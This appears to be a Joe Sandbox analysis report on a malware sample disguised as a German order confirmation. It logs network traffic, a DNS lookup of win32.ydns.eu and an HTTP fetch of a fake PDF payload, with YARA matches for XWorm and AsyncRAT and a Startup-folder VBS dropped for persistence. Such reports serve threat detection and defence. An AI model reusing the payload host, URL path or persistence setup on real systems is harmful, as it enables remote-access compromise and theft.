Mar 4, 2025 09:35:23.987217903 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987282991 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987293959 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987304926 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987319946 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987360954 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987478018 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987488031 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987498999 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987512112 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987523079 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987535000 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987546921 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987559080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987590075 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987720966 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987741947 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987755060 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987782001 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987793922 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987832069 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.115573883 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115598917 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115613937 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115624905 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115638971 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115677118 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.115695000 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115708113 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115717888 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.115727901 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.115751982 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.115771055 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.116497040 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116547108 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116559029 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116595984 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.116676092 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116688013 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116698980 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116712093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116731882 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.116758108 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.116810083 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116854906 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:24.116873026 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116972923 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.116985083 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:24.117026091 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:26.511295080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:26.511348963 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:37.675054073 CET	49709	80	192.168.2.6	45.144.214.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 4, 2025 09:35:20.758920908 CET	54590	53	192.168.2.6	1.1.1.1
Mar 4, 2025 09:35:20.778307915 CET	53	54590	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 4, 2025 09:35:20.758920908 CET	192.168.2.6	1.1.1.1	0xf243	Standard query (0)	win32.ydns.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 4, 2025 09:35:20.778307915 CET	1.1.1.1	192.168.2.6	0xf243	No error (0)	win32.ydns.eu		45.144.214.104	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

win32.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	45.144.214.104	80	5732	C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Timestamp	Bytes transferred	Direction	Data
Mar 4, 2025 09:35:20.789366961 CET	106	OUT	GET /never/lookinto/it/panel/uploads/Rieukcp.pdf HTTP/1.1 Host: win32.ydns.eu Connection: Keep-Alive
Mar 4, 2025 09:35:21.509648085 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 04 Mar 2025 08:35:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 04 Mar 2025 06:13:15 GMT ETag: "fa608-62f7e2b168c7c" Accept-Ranges: bytes Content-Length: 1025544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 50 76 e3 5a c2 59 1f a6 5a 4c d1 c8 7c 2f 07 96 22 a3 b0 1c 53 30 a6 ee da c0 d1 64 70 6a f6 cd d0 5a b1 2f 0d 43 4f bd 51 51 f5 1e 63 1d cb bf f1 fd 81 64 88 80 03 76 13 6b dc 07 d1 98 d3 3c 97 c1 a6 45 34 82 16 d2 5c d9 5d 7d b8 0b 3c b0 d2 20 e0 76 b9 66 e8 7e a3 c8 df 01 29 28 41 36 e2 f6 15 cf 46 ee 96 c2 cf b8 62 e5 64 1c 42 34 3f 5a 69 73 01 21 19 4e 21 34 68 c8 86 af 0b f0 94 ce a2 8f 54 32 4c 0d 6c 6c 20 3f 93 96 41 18 f4 49 22 a1 cb e3 9c 8f 65 58 77 e4 83 ec 37 33 90 17 2d 3a ca ca a6 d0 a7 45 d6 3c e3 47 c2 c9 cd d3 7a 5d c1 9e f3 5e 3e 8a 43 50 bb 32 1d d2 ad 0f 7e e9 8f 23 9c 45 33 05 e2 64 b7 cf cc 26 6f b5 ab 1e 9b 31 4c ff 96 57 ba 58 17 79 55 47 42 ef 46 5f 4a 32 d7 d2 38 3b 50 99 af f2 20 41 cd d9 e0 e1 06 ce 37 a0 d6 72 ba 25 d1 99 1e f9 e1 80 29 3c 59 34 b2 46 1f eb 6c bf 2a c5 fa 65 c8 64 18 16 00 2f 02 dd f3 8b 76 7b bf 22 9f db 46 64 41 3f 25 dc 0a f3 b6 ad 33 ca 01 e5 68 fd 96 09 6e 0f 88 0f bc f0 16 d2 c9 7a 02 46 85 95 68 a2 2f 2d c9 d1 37 98 8d 03 5d 40 95 f2 6a b4 37 bc [TRUNCATED] Data Ascii: PvZYZL\|/"S0dpjZ/COQQcdvk<E4\]}< vf~)(A6FbdB4?Zis!N!4hT2Lll ?AI"eXw73-:E<Gz]^>CP2~#E3d&o1LWXyUGBF_J28;P A7r%)<Y4Fled/v{"FdA?%3hnzFh/-7]@j77(Z=R6S<nuD(]XVCfo<1Z,=dtvVC ZFQ8/HuN<llO>s`G-mi_bzi]PP$E"2<]W[xlDp"o<5J%WUr9)I[u4Nv(Ra/z".kBc-P'YP$/_2y&Lu{8$+]Aq,AAPa9fX:A`pu1F?]sTw[CH,jV]/q+'C#&u(9)l.=_QrL[vP_CC%tW;zk[D#}te-=-Uc\.[,VPXb6KX ]i
Mar 4, 2025 09:35:21.509685040 CET	1236	IN	Data Raw: 9b 3d 7b 6f 1e 89 6b fd dc 93 5c f8 7d 0b 1c e1 2e d0 70 c0 a2 20 18 0d 77 53 0d 45 4d 67 78 f2 a2 83 0f 64 ed 51 08 6f b1 f9 fd d5 42 99 6f e0 06 0a 20 e3 6d 04 cb 3a a7 20 0d 50 6b 48 33 f3 8c 49 5e 72 d6 1e 96 4e 1a cc 0e ac cd 21 d2 36 66 04 Data Ascii: ={ok\}.p wSEMgxdQoBo m: PkH3I^rN!6fTO0+oAM$a*z_1Qk6_,SptQ>"$faW8W1~y!x'wjJ,9q&sgr8YokoHVrEUg8:SCzZ8PmD'
Mar 4, 2025 09:35:21.509701014 CET	1236	IN	Data Raw: a0 be e0 b5 34 1c 1d 98 e6 48 9d de 95 a7 19 21 9a 90 94 93 40 1f e3 a4 23 0f c2 4d 0e 03 55 80 73 07 a6 fc 95 c6 fc be 11 82 02 ed 63 07 86 86 68 42 cd d1 e3 6a 8d 73 06 0a 84 ae e1 b3 16 65 e6 ad 5c 7f 38 cd a2 74 f1 f6 25 1f c8 0b fb 36 d2 0b Data Ascii: 4H!@#MUschBjse\8t%6]/(W'SBXF5VJ@'1<4Uwas:s-)+x(i,%C }]?VJQ4{_3]4M8 XzV#6IxE1csm*YikH1
Mar 4, 2025 09:35:21.509783983 CET	1236	IN	Data Raw: a5 d6 80 68 7c 96 4b 8b 23 fb 44 e3 43 66 73 04 fe 78 cc ef c5 1e e6 92 2b 2e 63 e6 75 41 3b b1 9b 50 43 a5 7a 56 eb 1b d2 21 98 5f 4f 2d b0 e7 38 dc 8f 9c 07 7f e4 da af 0a fd 39 91 8c e8 3f ff 59 bc 60 b5 00 0c f9 be f9 77 b4 35 b3 5d cc 12 d1 Data Ascii: h\|K#DCfsx+.cuA;PCzV!_O-89?Y`w5],K?:s8&c4MroT89 &Hs%;rfHX>^f,\A/%ufHe55iby$X?b1fYuY)A,nq'
Mar 4, 2025 09:35:21.509799957 CET	1236	IN	Data Raw: 39 64 3f 75 ce d1 e9 45 3e 8f 15 ac f0 2c 84 28 ee 5d e9 82 29 38 b7 24 b2 a7 65 1f ce 5f 37 80 ef 42 c4 be c0 01 8c 37 c0 54 61 31 cd 15 30 3e a4 a2 87 78 b7 f5 8f 19 d6 e3 70 34 05 5d 62 fe a3 93 c8 e2 10 22 6e 2a 60 e1 ae 96 86 d8 7a b9 92 0b Data Ascii: 9d?uE>,(])8$e_7B7Ta10>xp4]b"n*`z2.bO08pSy-i&5VA 3N}F Z{\?u'Z6yb#^rP:%YFfz?:emaZZ7"+f
Mar 4, 2025 09:35:21.509813070 CET	1236	IN	Data Raw: 8f 9e 2a 8e 73 83 f9 6a d3 2d 49 05 52 d2 1b 6c 3b c2 87 81 7e 58 17 bd 4b 28 6f d4 9c 53 56 3f 3f 85 b4 b7 3c 9c f4 a7 58 52 7d af 69 e5 6a de af e3 81 23 ab 67 aa a3 a8 8c 21 38 c1 bc cd 5a 86 63 2d 59 39 ff 48 01 37 9e 52 5f 59 a9 54 b5 23 11 Data Ascii: sj-IRl;~XK(oSV??<XR}ij#g!8Zc-Y9H7R_YT#dY/1fE.w'+QU7N\|D>9+:rw^EYk0Ypajn{tALJ^nVvQh':q>$*V[6?Dw
Mar 4, 2025 09:35:21.509897947 CET	1236	IN	Data Raw: 35 43 12 7b 16 8c cc 12 65 94 5f 6a 60 47 90 f5 40 f4 98 3f 6b 02 93 4f fc 23 4c 97 fb 3d cc e5 94 b8 de f2 9c 3a bd 3f 9d c6 46 bd 80 4d 35 b4 0b 9e 7d 94 06 15 38 30 ed 3b 9c b2 51 80 67 0f ea 8c 16 43 fe f8 78 05 48 53 79 98 45 5c b9 8d d3 a7 Data Ascii: 5C{e_j`G@?kO#L=:?FM5}80;QgCxHSyE\/Tq`O}`@[hFI6]sU']c4tRN%DqA^uf;*eU9Z<gFB`g6iz4jMD#=p{5mI5z
Mar 4, 2025 09:35:21.509917021 CET	1236	IN	Data Raw: 34 10 d3 fe 51 2f 6d c9 34 32 8a d8 0b eb b9 9c a9 59 76 22 3b 34 e9 60 61 df 28 35 93 c3 e5 bb 71 9a 4d 9e 40 7b ea 82 33 92 8c e6 9a 08 e7 22 49 d0 15 fd 5d 6e 2a d5 d5 d3 7b 98 91 81 fc 81 e7 78 0e 8f 8c ed ff 1e 93 09 63 2d 7d f2 20 ed 11 83 Data Ascii: 4Q/m42Yv";4`a(5qM@{3"I]n{xc-} eZW!\G;jp!>B.GqZU>jWz&N'B'b?drN2lyz.H`WjM0e2v;/5oM\m~\Aw>6epwKI_G,
Mar 4, 2025 09:35:21.509931087 CET	1236	IN	Data Raw: 5d c0 9e 84 08 e0 ac c5 44 78 f2 d2 37 41 31 61 25 c9 57 d5 51 8e 10 fa 8f d2 a0 94 0e 6d ac 90 b4 51 0e df 03 50 5e 75 b6 29 2f db 37 f0 09 79 ee f3 1b d2 3a 8b ed 95 9a ec a6 bd d0 4d 53 44 9b e9 70 a8 e1 89 89 22 76 6a e4 df 4a 9c 8d 9e b3 be Data Ascii: ]Dx7A1a%WQmQP^u)/7y:MSDp"vjJF[[.3aQY@1_"q.]IpY086HpJ<]-"VGerC#t$00q"qw(:qe?H4UOdM
Mar 4, 2025 09:35:21.509948015 CET	1236	IN	Data Raw: e3 4f 99 70 f3 67 37 3e af 99 7e c5 25 99 d6 20 55 ad a1 9a 4d 62 83 fc a4 7b 78 a5 60 1f 55 86 3c d5 0f eb 7b f7 36 f2 25 01 13 0d 10 9c 0e 7a 96 cb 58 60 31 69 ef 47 e2 5e 04 ab 65 49 1c 73 b4 58 2b ad 14 67 7a 10 c6 07 26 c1 8e 9c a6 8b 40 2c Data Ascii: Opg7>~% UMb{x`U<{6%zX`1iG^eIsX+gz&@,Mw"EOl-1f/a$@nFNtt=35[i<_S$b-&8yaF-oOfTM"o>_CbuPB<H^1@nwx:;P>`\|
Mar 4, 2025 09:35:21.514883995 CET	1236	IN	Data Raw: 1e 10 d9 68 14 00 d4 38 7e fc ba cc d8 15 ab 88 ad 1f a5 59 87 6d 6a b6 84 24 be b7 42 41 dd de a1 b7 11 16 6a 49 33 cd 48 d2 34 59 00 bb 46 79 b2 71 13 9d 0b 10 b4 7e 0b 57 ad 46 98 65 17 ef 13 ac 1c 4c 01 93 c8 0d 4f 77 74 81 49 a8 ef d3 23 1a Data Ascii: h8~Ymj$BAjI3H4YFyq~WFeLOwtI#0mn,fR]n^] VLm+QT*K=Vz`(CE^. ;St"<g"^l(/1H5-B/up37BTOiJS!+>W

Target ID:	0
Start time:	03:35:19
Start date:	04/03/2025
Path:	C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe"
Imagebase:	0x640000
File size:	181'248 bytes
MD5 hash:	9BE63A33CE71DBAB9292A999480253FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2300569085.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:35:34
Start date:	04/03/2025
Path:	C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe"
Imagebase:	0x580000
File size:	181'248 bytes
MD5 hash:	9BE63A33CE71DBAB9292A999480253FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:35:37
Start date:	04/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 928
Imagebase:	0x550000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bestellbest#U00e4tigung.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Current.exe

C:\Users\user\AppData\Roaming\Current.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Windows Analysis Report
Bestellbest#U00e4tigung.exe